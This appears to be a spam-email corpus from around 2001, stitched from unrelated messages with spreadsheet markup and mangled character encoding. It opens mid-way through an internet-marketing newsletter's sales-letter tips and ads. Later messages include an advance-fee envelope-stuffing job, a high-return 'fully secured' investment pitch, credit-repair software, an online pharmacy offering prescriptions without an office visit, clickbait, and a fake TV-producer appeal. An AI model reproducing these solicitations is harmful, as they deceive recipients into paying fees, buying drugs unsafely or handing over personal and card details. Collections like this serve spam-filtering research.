forÂ  me?"Â  What need is it going to meet? What want is it
going to fill?Â  How is your product or service going to be
of value or benefit to the reader?Â  Spell it out.Â  Don't
focus on the features of your product or service , but
rather how those features will add value to the life of your
reader.
For example:Â  If you are selling automobile tires, you may
very well have the largest assortment of tires in the world,
but who cares? I don't care about your selection. But, I
do care about keeping my 3-month-old baby girl safe while
we are traveling.Â  So, instead of focusing on your selection,
you focus on the fact that my baby girl can be kept safe
because you have a tire that will fit my car. You're not
selling tires, you're selling safety for my family. Stress
the benefits, not the features.
11) Keep the reader interested.Â  Some sales letters read
like they are a manual trying to explain to me how I can
perform some complicated surgery on my wife. They are
filled with words and phrases that I need a dictionary to
understand.Â  Unless you are writing to a very targeted
audience, avoid using technical language that many readers
might not understand. Keep it simple, using words, language
and information that are easy to understand and follow.
12) Target your sales letter.Â  When you are finished with
your final draft of the sales letter, target it to a
specific audience.Â  For example: If you are selling a "work
at home" product, then rewrite the sales letter by adding
words in the headlines and ad copy that are targeted towards
women who are homemakers.Â  Then, rewrite the same sales
letter and target it to college students.Â  Write another
letter targeting senior citizens.Â  Still another could be
written to high school teachers wanting to earn extra income
during summer vacation.Â  The possibilities are endless.
All you need to do is add a few words here and there in
your ad copy to make it appear that your product or service
is specifically designed for a target audience. "Work only
5 hours a week," would become "College Students, work only
5 hours a week."Â  Your sales letter is now targeted. Upload
all of the sales letters to separate pages on your website
(you could easily target 100's of groups).
Then, simply advertise the targeted pages in targeted
mediums.Â  You could advertise the "College Students" page
in a campus ezine.Â  The "Senior Citizens" page could be
advertised at a retirement community message board.
By creating these targeted sales letters, you can literally
open up dozens of new groups to sell your existing product
to.Â  And, in their eyes, it looks like the product was a
match made for them.
13) Make your ad copy easy to follow.Â  Use short sentences
and paragraphs. Break up the sales letter with attention
grabbing headlines that lead into the next paragraph. One
thing that I have always found to work very well in sales
letters...
Â Â Â Â  ...is to use a pause like this.
Start the sentence on one line, leaving the reader wanting
to know more, and then finishing up on the next line. Also,
if you are going to use a sales letter that continues on
several different pages of your website, use a catchy hook
line at the end of each page to keep them clicking. "Let's
get you started down the road to success, shall we? CLICK
HERE to continue."
14) Use similes and metaphors for effect.Â  When the
customer purchases your product, they will generate "a flood
of traffic that would make Noah start building another ark."
If they do not order today, then they will "feel like a cat
that let the mouse get away."Â  Use words to create a picture
in the readers' mind.Â  When you think of Superman, what
comes to mind?Â  Immediately, we remember that he is "faster
than a speeding bullet."Â  "More powerful than a locomotive."
"Able to leap tall buildings in a single bound." See how
word pictures stick in our minds?
15) Focus on one product or service.Â  Don't try to sell
your customer multiple products at the same time. It only
confuses the reader.Â  Keep your ad copy directed at one
specific product or service.Â  Then, use other products and
services as back-end products.
16) Make it stand out.Â  Don't kid yourself.Â  There are
hundreds, maybe thousands out there on the web doing the
same thing you are doing.Â  How will you stand out among the
crowd?Â  Your sales letter must inject personality. It must
breathe of originality.Â  Your product or service is
different. It's not like all of the rest.Â  It is unique.
Right? Your sales letter must separate you from the
competition.Â  It must create a feeling of "You won't find
this anywhere else."
17) Be believable. "Earn $54,000 in the next 24 hours!!!"
Delete.Â  Good grief, do they think I am an idiot or
something?Â  Get real.Â  Don't make outrageous claims that
are obviously not the truth.Â  You'll ruin your reputation.
Let me tell you a simple universal fact that cannot be
reversed.Â  Once you have been branded a liar, you will
NEVER be anything but a liar.Â  It doesn't matter if you
launch the most respectable, honest business available
anywhere, people will always have doubt because they
remember the crazy stuff you've said before.Â  Be believable.
Don't exaggerate, mislead, stretch or distort the truth.
18) Be specific. Don't generalize your information, but
rather be EXACT.Â  Instead of "over 100 tips for losing
weight" use "124 tips for losing weight." By generalizing
information, it creates doubt and questions in the reader's
mind.Â  "What am I really getting here?Â  Does he even know?"
When you use specific information, the reader begins to
think, "This person must have counted.Â  I know exactly what
I can expect."Â  "Platitudes and generalities roll off the
human understanding like water from a duck," wrote Claude
Hopkins in his classic book "Scientific Advertising." "They
leave no impression whatsoever."
19) Be complete. Tell the reader everything they would
want to know about your product or service.Â  Answer all of
their questions, anything they would want to consider before
making a purchase.Â  Think about it from their point of view.
Ask yourself, "Why wouldn't I buy this?"Â  Then, address that
in your sales letter.Â  Remove anything that would keep the
reader from making the purchase.
20) Use testimonials to boost your sales.Â  Share actual
excerpts from what your current customers are saying about
your product or service. Many websites have an entire
section or even a separate page that has endorsements and
compliments listed.Â  Satisfied customers remove some of the
doubt in the mind of the reader.Â  "If these people have
found a lot of value and benefit in the product, then I
probably will too."Â  Especially effective are testimonials
from respected, well known "authorities" within your target
field.
21) Use headlines over and over throughout the sales letter.
A headline isn't just relegated to the beginning of your
ad copy.Â  Use them frequently -but don't overuse.Â  A well-
placed headline re-grabs the reader's attention, brings
them deeper into the letter, and readies them for the next
paragraph. You will want to spend as much time working on
your headlines as you do the entire sales letter.Â  They are
that important.
22) Avoid asking stupid questions.Â  "Wouldn't you like to
make $1,000,000 a year?" "Doesn't that sound great?" "Would
you like to be as successful as I am?"Â  Avoid any question
that insults the intelligence of your reader or makes them
feel like they are inferior.
23) Offer a freebie even if the customer doesn't buy.
If the customer decides he or she isn't going to make a
purchase, then you want to follow-up with them later to try
to influence them to buy in the future.Â  By offering a free
item, you canÂ  request their email address in order to
obtain the freebie.Â  By doing this, you can now follow-up
with the customer for a potential future sale.
Additionally, you can continue the sales process by having
your ad copy, banners, flyers, etc. within the free item.
And, of course, if your free item is a high quality, useful
product or service which impresses the customer, they
probably will be back as a customer soon.
24) Use bonuses to overwhelm the reader.Â  One of the things
that I have found very effective in writing sales letters
is to include bonus items that OUT-VALUE the actual product
I am offering.Â  Ginsu made this one famous. They were
selling a set of steak knives, but before the commercial
was finished, you had so many bonus items on the table
it was hard to refuse. Make sure you provide quality
bonuses and not some worthless, outdated junk that damages
the credibility of your main offer.
25) Use connective phrases like "But wait, there's more"
and "But that's not all."Â  These phrases effectively lead
the reader from one paragraph to the next, particularly
when the next paragraph is a bullet list of benefits, or
leads into bonus items.Â  Again, the idea is MORE and MORE
value and benefits to the reader.
26) Always include a deadline.Â  By including a deadline,
you create a sense of urgency in the mind of the customer.
"If I don't order within 24 hours, then I won't get the
bonuses."Â  "Oh no, there are only 10 items remaining,
I've got to hurry."Â  Let the customer know what they will
be missing out on if they don't make the deadline. Remember,
they won't miss out on your products or bonuses, they will
miss out on all of the benefits of your products. Deadlines
are very effective.Â  Every sales letter should have one.
27) Tell them exactly how to order.Â  Be clear as to the
order process. Point them towards the order link.Â  Tell
them what methods you offer. (I.E. credit cards, checks,
etc.)Â  Make this process as simple and clear as can be.
If it takes more than 2 steps, most people won't continue.
28)Â  Explain when the product will be delivered.Â  How
quickly will the order be processed?Â  When will the order be
available?Â  Let the customer know exactly what they can
expect when they place their order.Â  The more specific you
can be here, the better.Â  Let them know that you have a
system in place.Â  "Operators are standing by."Â  Their order
will be handled properly.Â  Tell them.
29) Offer a money back guarantee.Â  Take away their last
reason to hold back.Â  Offer a "no questions asked" 30 day
guarantee.Â  Most people may not realize this, but in most
cases, it's the law of the land.Â  You are REQUIRED to give
them their money back if they are not satisfied with the
product or service.Â  Since it's the law anyway, why not make
it a benefit. Let them know that they are purchasing your
product or service RISK-FREE.
30) Instruct them to respond immediately.Â  Many people
just need to read those words, "Act Now!"Â  "Order today!"
"Click Here to Instantly Place Your Order."Â  You've got them
this far, now tell them what you want them to do.Â  Get them
to "Act Fast!"Â  Have you ever heard a mail order commercial
on television that didn't prompt the viewer to order right
way?
31) Include a post script.Â  People will always read the
P.S.Â  Always. In fact, the P.S. is one of the MOST IMPORTANT
parts of your sales letter. Why?Â  Because in many cases the
visitor at your website will scroll immediately down to the
end of your page to see how much it is going to cost.Â  A
P.S. is a perfect place to recap your offer, so when they
see your price tag, they will also see a very detailed
description of what they will receive for their money. Use
your P.S. to restate your offer in detail.
32) Include a second post script.Â  You better believe
if they read the first P.S., they will read a P.P.S.Â  Use
this post script to remind them of the deadline or offer
another bonus or point out some compelling factor that would
make them want to order.Â  I guarantee you they will read it.
Use these 32 tips and I guarantee you that you will see
a significant increase in the amount of responses you
receive from your sales letters.Â  In fact, it would be
impossible for your responses to not improve.
Â 
Copyright 2000 Jimmy D. Brown. All rights reserved worldwide.
-------------------------------------
About the Author...
Jimmy D. Brown is helping average people get out of
the rat-race and earn a full-time living online. For
more details on firing your boss and creating your
own internet wealth, visit us right now at:
http://www.roibot.com/w.cgi?R18328_privatevault
* Special offer: Join the Profits Vault through the above
link and email me your receipt and you can have a FREE BONUS
copy of The Terrific Manual - How To Profit From Free
Ebooks GUARANTEED which I sell at:
http://www.businessmarketinginformation.com/ebookmarketing/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Member Showcase
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Examine carefully - Those with email addresses included WILL
TRADE LINKS with you... You are encouraged to contact them.
There Are Many Ways To Build A Successful Business - Just look at
these successful sites &amp; programs other members are involved
in...
---------------------------------------------------------------------
Affiliates of the World!
Top rated affiliate programs, excellent business opportunities,
great marketing resources and free advertising for you!
Visit the site to trade links. http://www.affiliates.uk.com
Trade Links - adrianbold@affiliates.uk.com
---------------------------------------------------------------------
Get INSANE amounts of traffic to your website.
Purchase 10,000 Guaranteed Visitors to your site
and receive 5,000 free. MORE TRAFFIC = MORE MONEY!
Less than 2cents a visitor.Â  Space is limited.
Order Now! http://www.freepicklotto.comÂ 
Trade Links - businessopps@aol.com
---------------------------------------------------------------------
Celebration Sale!
$99.00 on Casinos/Sportsbetting sites, Lingerie stores,
Gift Stores, Adult Sites &amp; Toy Stores.
Mention Ad#BMLM99 to receive this special sale price.
Order Now!
http://www.cyberopps.com/?=BMLM99
---------------------------------------------------------------------
JUST BEEN RELEASED!!
Internet Marketing guru Corey Rudl has just released a
BRAND NEW VERSION of his #1 best-selling Internet Marketing
Course,"The Insider Secret's to Marketing Your Business on
the Internet". A MUST HAVE! So don't hesitate,
visit.. http://www.adminder.com/c.cgi?start&amp;bgmlmezine
---------------------------------------------------------------------
We have a 260 page catalog with over 3000 gift items for men,
women, children - A gift for everyone. We show 100 gift items
on our web site alone, with the catalogÂ  you have access to
the rest. We also feel we have the best prices on the web.
Visit at http://www.treasuresoftomorrow.net
Trade Links - george1932me@yahoo.com
---------------------------------------------------------------------
Stop Smoking - Free Lesson !!
Discover the Secret to Stopping Smoking.
To Master these Powerful Techniques, Come to
http://www.breath-of-life.net
for your Free Lesson.
Act Now!Â  P.S. Tell someone you care about.
Trade Links - jturco3@hotmail.com
---------------------------------------------------------------------
If you have a product, service, opportunity or quality merchandise
that appeals to people worldwide, reach your targeted audience!
For a fraction of what other large newsletters charge you can exhibit
your website here, and trade links for only $8 CPM.Â  Compare
that
to the industry average of $10-$15 CPM. Why?... Because as a
valuable member we want you to be successful! Order today -
Showcases are limited and published on a first come, first serve
basis.
For our secure order form, click here: http://bannersgomlm.com/ezine=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Are You Ready For Your 15 Minutes of Fame?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=One of the items we would like to include in Community &amp;
Commentary we'll need from you! Here is your chance to
showcase your marketing strategies, and I need to hear
from everyone who would like to 'blow your own horn' and
be in the spotlight on center stage.
It's a great way to enjoy recognition and publicity for
yourself and your business, and will allow all members to
duplicate your success and avoid the same 'setbacks'.
Please include... a little background history, how you got
your start, a problem you have had and how you solved it,
your greatest success, and any advice you have for someone
beginning to market online.
Send your information to &lt;Submit@AEOpublishing.com&gt;
with 'Center Stage' in the Subject block.=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Win A FREE Ad In Community &amp; Commentary
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=To keep this interesting, how about this, every month we'll
draw a name from the replies and that person will win one
Sponsorship Showcase ad in the Community &amp; Commentary, for FREE.
That's a value of over $700.00! Respond to each weekly survey,
and increase your chances to win with four separate entries.
Â Â Â Â Â Â Â Â Â Â  QUESTION
OF THE WEEK (06/29/01)...
Â Â Â Â  No right or wrong answers, and just by answering
Â Â Â Â  you are entered to win a Showcase ad - Free!
Â Â Â Â  ~~~ What is the goal of your website? ~~~
Â Â Â Â  SellÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
mailto:one@AEOpublishing.com
Â Â Â Â  Get LeadsÂ Â Â Â Â Â Â Â Â Â Â 
mailto:two@AEOpublishing.com
Â Â Â Â  Build BrandingÂ Â Â Â Â Â 
mailto:three@AEOpublishing.com
Â Â Â Â  Provide InformationÂ  mailto:four@AEOpublishing.com
Â Â Â Â  OtherÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
mailto:five@AEOpublishing.com
To make this as easy as possible for you, just click on the
e-mail address that matches your answer - you do not need to
enter any information in the subject or body of the message.
** ADD YOUR COMMENTS!Â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question.Â  Multiple responses
from the same individual will be discarded.=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=To change your subscribed address,
send both new and old address to Submit
See below for unsubscribe instructions.Please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email:  YourMembership2@AEOpublishing.com
voice:  
web: http://www.AEOpublishing.com
------------------------------------------------This email has been sent to jm@netnoteinc.com at your 
request, by Your Membership Newsletter Services.Visit our Subscription Center to edit your interests or unsubscribe.
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.6w8clu67&amp;m=bd7n7877&amp;ea=jm@netnoteinc.comView our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jspPowered by 
Constant Contact(R)
www.constantcontact.com
---259765881.993893904265.JavaMail.RovAdmin.rovweb002
Content-Type: text/html; charset=iso-8859-1
Your Membership Community &amp; Commentary, 06-29-01Your Membership Community &amp; Commentary
Â Â It's All About Making Money
June 29, 2001Â Â in this issue
32 Easy Ways To Breath New Life Into Any Webpage
Member Showcase
Are You Ready For Your 15 Minutes of Fame?
Win A FREE Ad In Community &amp; CommentaryToday's Special Announcement:
We can help you become an Internet Service provider within 7 days or we will give you $100.00!!
Click Here
We have already signed 300 ISPs on a 4 year contract, 
see if any are in YOUR town at:
Click Here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Â Â Information to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power and potential the web brings to every Net-Preneur. 
--- This Issue Contains Sites Who Will Trade Links With You! --- 
 32 Easy Ways To Breath New Life Into Any WebpageÂ Â Â Â Â Â Â  It's true.
Ask the CEOs of Yahoo.com and America Online.Â  They'll
tell you it's true.Â  Send an email to Terry Dean or Allen
Says or Jim Daniels and ask them about it.Â  They'll agree
100% that it's true.Â  Don't just take my word for it.
In fact, you can contact any of the 10,000 folks online
selling web marketing resources, and they will all tell you
emphatically, without question, no doubts whatsoever, that
it is absolutely true.
It's true. ANYONE can earn a living online.Â  Really, they
can.Â  But, it takes several very important components to
join the 5% who are successful on the web.
Â Â Â Â  One of those necessities is a website.
Â Â Â Â  Now, your website does one of two things...
Â Â Â Â  ...it either makes the sale, or it doesn't.
For 95% of online businesses, their websites simply do
not produce results.
And there is a very simple reason for poor performance.
Poor sales letters.
Does your website convince people to make a purchase?
If not, here are 32 easy ways to breathe new life into
your sales letter...
1) Write your sales letter with an individual in mind.
Go ahead and pick out someone, a real person to write your
sales letter to.Â  Doesn't matter if it is grandma or your
next door neighbor or your cat.Â  Write your sales letter
just like you are writing it to them personally.Â  Why?
Because when your potential customer reads, it then it will
seem personal, almost like you wrote it with them in mind.
Too often, sales letters are written as if they were going
to be read to an audience rather than one person.Â  Keep your
sales letters personal, because one person at a time is
going to read them.
2) Use an illustration to get your point across.Â  In my
sales letters I have told stories about my car stalling on
the side of the road to illustrate the idea that we must
constantly add the fuel of advertising to keep our
businesses running. I have compared the hype of easily
making millions online to the chances of me riding bareback
across Montana on a grizzly bear.Â  Leads have read of how
getting to the top of an oak tree relates to aggressively
marketing online. People love a good story that pounds home
a solid message.Â  Tell stories that illustrate a point you
are trying to make.Â  Emphasize a benefit by sharing an
account from the "real world."Â  It effectively creates
interest and further establishes the point.
3) Create an interest in the reader from the very first
line.Â  Your first line of the sales letter should
immediately create a desire in the reader to want to know
more.Â  Go back to the beginning of this article.Â  The first
words were, "It's true."Â  I can guarantee you that either
consciously or subconsciously you thought "What's true?"
Immediately, your mind wanted to know what I was talking
about.Â  Before you even knew it you were right here, 8
paragraphs into this article.Â  Carefully craft your first
line.Â  If you can immediately get them wanting to know more,
you've got a winner.
4) Use bullets. People spend a lot of time reading bulleted
lists. In fact, they often reread them over and over. Use
bulleted lists to stress the benefits of your product or
service, to spell out exactly what is included in your offer.
Use an extra space in between each bullet to really highlight
each line and create a sense of more length to the list.
5) Launch into a bullet list immediately.Â  Shortly after
your opening line, immediately give the reader a bullet
list of benefits to absorb.Â  Hit them with your best shot.
Pull out the big guns and stress "just a few of" the most
important things the reader will discover.Â  By offering a
killer list early in your sales letter, you will automatically
create a desire in the reader to continue through your ad
copy.Â  After all, if they are already interested after the
first list of benefits, they will certainly be open to
finding out even more reasons why your product or service
will aid them.
6) Just let it all flow out.Â  Write down everything that
enters your mind as you are writing your sales letter. You
can edit it later.Â  If you just sit and start writing
everything you know about your product or service and how it
will benefit your customer, you will be amazed at how much
information floods your mind.Â  Write it ALL down.Â  Then read
through it - you'll be able to add a lot more detail to
many of the points.Â  Edit it after you have exhausted all
of your ideas.
7) Make your sales letter personal.Â  Make sure that the
words "you" and "your" are at least 4:1 over "I" and "my."
Your ad copy must be written about YOUR CUSTOMER not
yourself.Â  I'm not sure how the old advertising adage goes,
but it's something like this, "I don't care a thing about
your lawn mower, I just care about my lawn."Â  Leads aren't
interested in you or your products, they are interested in
themselves and their wants and needs.Â  When y</t>
  </si>
  <si>
    <t xml:space="preserve">Save 70% On Your Life Insurance!Check Out These Prices!!!$250,000Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
$500,000Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
$1,000,000Age Male FemaleÂ Â Â Â Â Â  Age Male FemaleÂ Â Â Â Â Â Â 
Age Male Female30Â Â Â  $12Â Â Â Â  $11Â Â Â Â Â Â Â 
30Â Â Â  $19Â Â Â Â  $15Â Â Â Â Â Â Â Â Â Â Â 
30Â Â Â  $31Â Â Â  $27
40Â Â Â  $15Â Â Â Â  $13Â Â Â Â Â Â Â 
40Â Â Â  $26Â Â Â Â  $21Â Â Â Â Â Â Â Â Â Â Â 
40Â Â Â  $38Â Â Â  $37
50Â Â Â  $32Â Â Â Â  $24Â Â Â Â Â Â Â 
50Â Â Â  $59Â Â Â Â  $43Â Â Â Â Â Â Â Â Â Â Â Â 
50Â Â Â  $107Â Â Â  $78
Â  60Â Â Â  $75Â Â Â Â  $46Â Â Â Â Â Â Â 
60Â Â Â  $134Â Â Â  $87Â Â Â Â Â Â Â Â Â Â Â 
60Â Â Â  $259Â Â Â  $161(Smoker rates also available)Take a minute to fill out the simple form below and receive a FREE
INSTANT quote comparing the best values from among HUNDREDS of the
nation's top insurance companies!
DON'T MISS THIS!
Click Here For A Free Custom Quote!!
Save 70% On Your Life Insurance!==========================================
To be removed from our mailing list  CLICK HERE
==========================================
</t>
  </si>
  <si>
    <t xml:space="preserve">
Have you checked your personal credit reports recently?If you are planning making any major purchase like purchasing a Home or 
newcar or getting a new job or even a promotion, Please....read on!You need to have a GOOD to EXCELLENT credit rating.  If you do already, 
that's important, but if you know your credit is less than perfect, you need 
to get those negative remarks REMOVED, LEGALLY and quickly.How?  It's easier than you think.With NuCredit Software YOU can clear any negatives already on your 
credit reports, This requires NO experience OR special skills from you to use our 
program.  This is how we can help:Getting "Excellent Credit" has never been easier athttp://nuew2.dyn.eeFor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credit."We" will not clear your negative credit, but "you" can, and easily 
too. You are not going to spend hundreds or even thousands of dollars to do 
it,or depend on someone you don't even know to take action. If you can send an email, you can operate our software. It's just that 
simple.This "Fast and easy-to-use" program is called, NuCredit. Here is a brief description:The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to:http://nuew2.dyn.eeLet's get started today!. Don't let another minute pass.To be removed click belowhttp://nuew2.dyn.ee/remove.htmHave you checked your personal credit reports recently?If you are planning making any major purchase like purchasing a Home or </t>
  </si>
  <si>
    <t xml:space="preserve">
Attention:  Internet Domain RegistrantThe new top level domain names with extensions .BIZ, .INFO, .PRO, 
and .NAME have just been approved by global internet authorities 
and will be released soon, but don't wait until then to register.  
These domains are available NOW for pre-registration at:
http://www.RegisterNewExtensions.net on a first come, first serve 
basis."While .com names hold the most prestige, the next frontier is
the new suffixes -.info, .biz, and .pro -likely to become available
later this year..."
-BUSINESS WEEK MAGAZINE, April 16, 2001.It is expected that over 3 million of these new domain names will be
registered in the first few minutes when registration officially opens
later this year. If your domain name is important to you, be prepared 
and pre-register now. Protect your domain name from cybersquatters and 
speculators. We have the premier pre-registration engine to help you 
to secure the domain you want.  Over 250,000 names have already been 
queued into our list and good names are going fast.  Do not wait until 
the last minute.  Go to http://www.RegisterNewExtensions.net now to 
pre-register.#######################################################################
This message is sent in compliance with the new email bill section 301.
Per Section  301, Paragraph (a)(2)(C) of S. 1618 and is not intended 
for residents in the State of WA, NV, CA &amp; VA. If you have received 
this mailing in error, or do not wish to receive any further mailings 
pertaining to this topic, simply send email to: del_list_tld@yahoo.com.
We respect all removal requests.
#######################################################################</t>
  </si>
  <si>
    <t xml:space="preserve">
H
6.29% Fixed Rate!!
HRates Have Fallen Again!!!
DO NOT MISS OUT!!
LET BANKS COMPETE FOR YOUR
BUSINESS!!!
ALL CREDIT WELCOMEClick Here Now For Details!~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
CLICK HERE to unsubscribe from this mailing list
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
</t>
  </si>
  <si>
    <t xml:space="preserve">
The Internet's Online PharmacyViagra - Xenical - Propecia - Claritin - Celbrex - Renova - ZybanNow get your prescriptions approved by a panel of licensed medical doctors online without the need for an office visit.After approval of the doctor the medication will be shipped right to your door.Visit The Internets Online Pharmacy by clicking the link below:http://pharm5.onchina.net/To be removed from future mailings send an email to unlist4me@yahoo.com with remove in the subject</t>
  </si>
  <si>
    <t xml:space="preserve">
------=_NextPart_000_6395_000076C1.00005D45
Content-Type: text/html;
 See the VIDEO Britney Wants BANNED!
STOLEN HOME VIDEO OF BRITNEY SPEARS
&amp; WE HAVE THE VIDEOTAPE!!!!
 CLICK HERE!Britney Caught With Her Mouth Full!
http://members.tripod.co.uk/hannah782________________________________
Screening of addresses 
has been done to the best 
of our technical ability.
We respect all removal requests.If You Don't Want To Receive This Email Again
Then Simply Click The Following Link To Be Removed!
(You Must Click It To Be Removed) REMOVE ME! See the VIDEO Britney Wants BANNED!STOLEN HOME VIDEO OF BRITNEY SPEARS
</t>
  </si>
  <si>
    <t xml:space="preserve">We have been trying to reach you!It's real important that you call regarding your Sweepstakes Entry!1-800-401-4948Thanks,
Angie Taylor
Call Mon-Fri 9:30am-3:30pm EST @ 1-800-401-4948**Available for U.S. residents only.**
1-800-401-4948To be removed from this mailing reply to
mailto:angie_pepi@runbox.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
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it.CLICK HERE FOR DETAILS http://thelastprogram2001.50megs.comIf you have any questions or concerns please feel free to call me at 702 604 
6163
Warmest regards
RickDo not reply to this message - 
To be removed from future mailings:
mailto:grantuit2001@yahoo.com?Subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Make 20% In 9 Months-Fully Secured!Investor Alert:Is the stock market roller coaster making you worried?
Join the flight to quality. Make 20% in 9 months!!!Earn over 2% monthly through fully secured Accounts
Receivable Acquisitions-prepaid monthly in advance!!!You heard right-over 2% monthly prepaid in advance!Discover what banks have been doing for decades.Harness the power &amp; liquidity of fully secured accounts
receivable acquisitions.Look into our safe haven with a return of 20% in 9 months-
earn over 2% monthly, prepaid in advance!Contact us for your "FREE" In-Depth Information Package.
Just fill out the form at our website!
http://205.232.135.76/20percent(REMOVAL INSTRUCTIONS)
This mailing is done by an independent marketing company.
We respect your online privacy and apologize if you have
received this message in error. We do respect our remove lists!
Please do not use the reply to this e-mail, an e-mail reply
cannot be read! If you would like to be removed from our mailing
list just click below and send us a remove request email.
(To Be Removed)
mailto:nada4me@europe.com?subject=Remove*ARA
</t>
  </si>
  <si>
    <t xml:space="preserve">
This powerful drink is not labeled "Romance in a Bottle" for nothing!
It's powerful blend of aphrodisiac herbs will put the sizzle back in your relationship...see for yourself!
NIAGARA is the fizzy blue herbal tonic that is sweeping the nation by storm! You've heard about it, read about it, talked about it, and watched it on television!Â  
The FDA does not regulate and approve herbal products. However, Niagara's ingredients listing and labeling
does meet with FDA approval. Niagara is not suitable for children, pregnant women or persons sensitive to caffeine
or with high blood pressure. FOR MORE INFO: Click HEREÂ 
OR Simply Reply with "99" in the SUBJECT Field
Â 
The form below can be faxed to 480.314.5776
Order Form-NameÂ Â Â Â Â Â  
Address:Â  
City:Â Â Â Â Â Â Â Â Â  
StateÂ Â Â Â Â Â Â  
ZipÂ Â Â Â Â Â Â Â Â Â Â 
PhoneÂ Â Â Â Â  
Credit Card Info-
Credit Card Type:Â Â Â Â  
Card
  NumberÂ Â Â Â Â Â Â Â Â Â Â  
Expiration DateÂ Â Â Â Â Â Â  
Order QuantityÂ Â Â Â Â Â Â Â Â  To Remove Your Address From Our Mailing List: Click HEREÂ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
I am a TV producer for one of the three major networks and
I am working on a new primetime special. We're looking for a 
special story and thought you might be able to assist.
THIS IS NOT A SALES PITCH FOR ANYTHING! 
I AM REALLY LOOKING FOR A GREAT STORY!-----------------
PLEASE READ THIS! 
-----------------Here's the type of story we are seeking;Are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
  </si>
  <si>
    <t xml:space="preserve">
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it.CLICK HERE FOR DETAILS http://lastprogram.members.easyspace.comIf you have any questions or concerns please feel free to call me at 702 604 
6163
Warmest regards
RickDo not reply to this message - 
To be removed from future mailings:
mailto:grantuit2001@yahoo.com?Subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">
  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processed.**********Full Name : 
Address : 
City : 
State : 
Zip Code : 
Home Phone : 
Work Phone : 
Best Time to Call : 
E-Mail Address : 
Estimated Debt Size : **********Please allow upto ten business days for application
processing.Thank You
Note: If this e-mail arrived to you by error, or you wish
to never receive such advertisements from our company,
please reply to this e-mail with the word REMOVE in the
e-mail subject line. We apologize for any inconveniences</t>
  </si>
  <si>
    <t>I am a TV producer for one of the three major networks and
I am working on a new primetime special. We're looking for a 
special story and thought you might be able to assist.
THIS IS NOT A SALES PITCH FOR ANYTHING! 
I AM REALLY LOOKING FOR A GREAT STORY!-----------------
PLEASE READ THIS! 
-----------------Here's the type of story we are seeking;Are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
  </si>
  <si>
    <t xml:space="preserve">
HOME-MAILERS NEEDED!
$300-$1000 PLUS WEEKLYSimple, pleasant work...you do at home.
Dear Friend,
Are you seeking a rewarding second income? Would you like to set your
own work schedule? Work the hours you choose? Earn extra income for
your family? If so, then we may have the answer. Current statistics show
that by the year 2010, 40-60% of the American work-force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Home-Mailers Program, which consists of envelope processing and mailing.
These positions require no special skills or experience, just a sincere desire
to GET STARTED, and EARN MONEY!
  YOU CAN EARN GOOD MONEY!!!
   Potential incomes range from $300 to $1000 weekly or more. Pay rate is
based on a $2.00 per envelope basis. The average Home-Mailer
stuffs anywhere from 150 to 500 envelopes a week, depending on the
amount of free time they have available. The envelopes you process will
make you a substantial income. You'll find this work, done easily and
quickly, can double or even triple your income. With just one or two hours
per day you will be excitedly surprised at how easy we've made it and how
profitable this work actually is. You can earn enough money working in
your spare time to purchase that new car or boat you've been wanting,
pay off credit cards, bills, or even take a vacation. Maybe just add more
financial security for yourself or your family. Whatever the reason, you can't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$27.00. This fee covers processing and
materials you will receive upon your acceptance and is returned to you
with your first paycheck. It also assures us that you are serious about
working with our company as a Home-Mailer. We will not ask or require
you to pay us for any additional information, instructions, or materials to
stay with us, and stay with us as long as you desire. If for any reason you
are not accepted into the Home-Mailers Program, your processing fee will
be sent directly back to you. There is no hassle. However, you must act
promptly. At this time we are in need of dependable Home-Mailers in your
area, of whom may start in the very near future. There are only a limited
number of positions needed for each region of the country and as soon as
we have enough people to complete the mailing needs in your area we
will not be offering any more applications. We need your help now! So if
you're a productive, positive person we're looking forward to working with
you.
  SIMPLE, EASY, AND PROFITABLE, THIS PROGRAM IS THE BEST
  WAY TO MAKE AN EXCELLENT INCOME AT HOME.
  If this sounds like something you might be interested in, read on. If not,
thank you for your time. We hope to hear from you soon.
Sincerely Yours,Ron M. Jenkins
Home-Mailing Division Manager
  Start earning now. Here's what you need to do.
(1) Read, complete, and return the attached application.
(2) Enclose a one time materials and processing fee of $27.00.
(3) All correspondence and materials will be addressed to you.
Please open on day of arrival.
(4) Follow all instructions when processing and mailing.
(5) If you find yourself pressed for time, you can stop work
with us and come back at a later date, but we must insist you
maintain a high level of quality when processing and mailing.
  OUR STEP-BY-STEP SYSTEM OF BROCHURE MAILING IS SIMPLE AND OUR
  INSTRUCTIONS ARE WRITTEN IN AN EASY TO FOLLOW LANGUAGE.
  There is a way to earn a substantial income at home...
  The Home-Mailers Program.
  YOUR SERVICES ARE NEEDED NOW.
  Please Respond Today! Positions are limited and time can affect
  your acceptance for desired positions.
  FILL OUT APPLICATION AND RETURN TO OUR ADDRESS BELOW
 Last Name:____________________  First Name:_______________________
 Mailing Address:_________________________________________________
 City:____________________________ State:_______________________
 Zip Code:______________________
 Home Tel.#: (_______)________-_________  Age:______
 Date of Birth:_____/_____/______
 E-mail Address:______________________________
 Do you work more than 40 hours per week?  [  ]Yes   [  ]No
 (READ AND SIGN BELOW) By signing, I state that I am interested in
 becoming a Home-Mailer for your company and wish to have all of the
 necessary materials and instructions sent to me at the above address.
 Signature_______________________________  Date:______/______/______
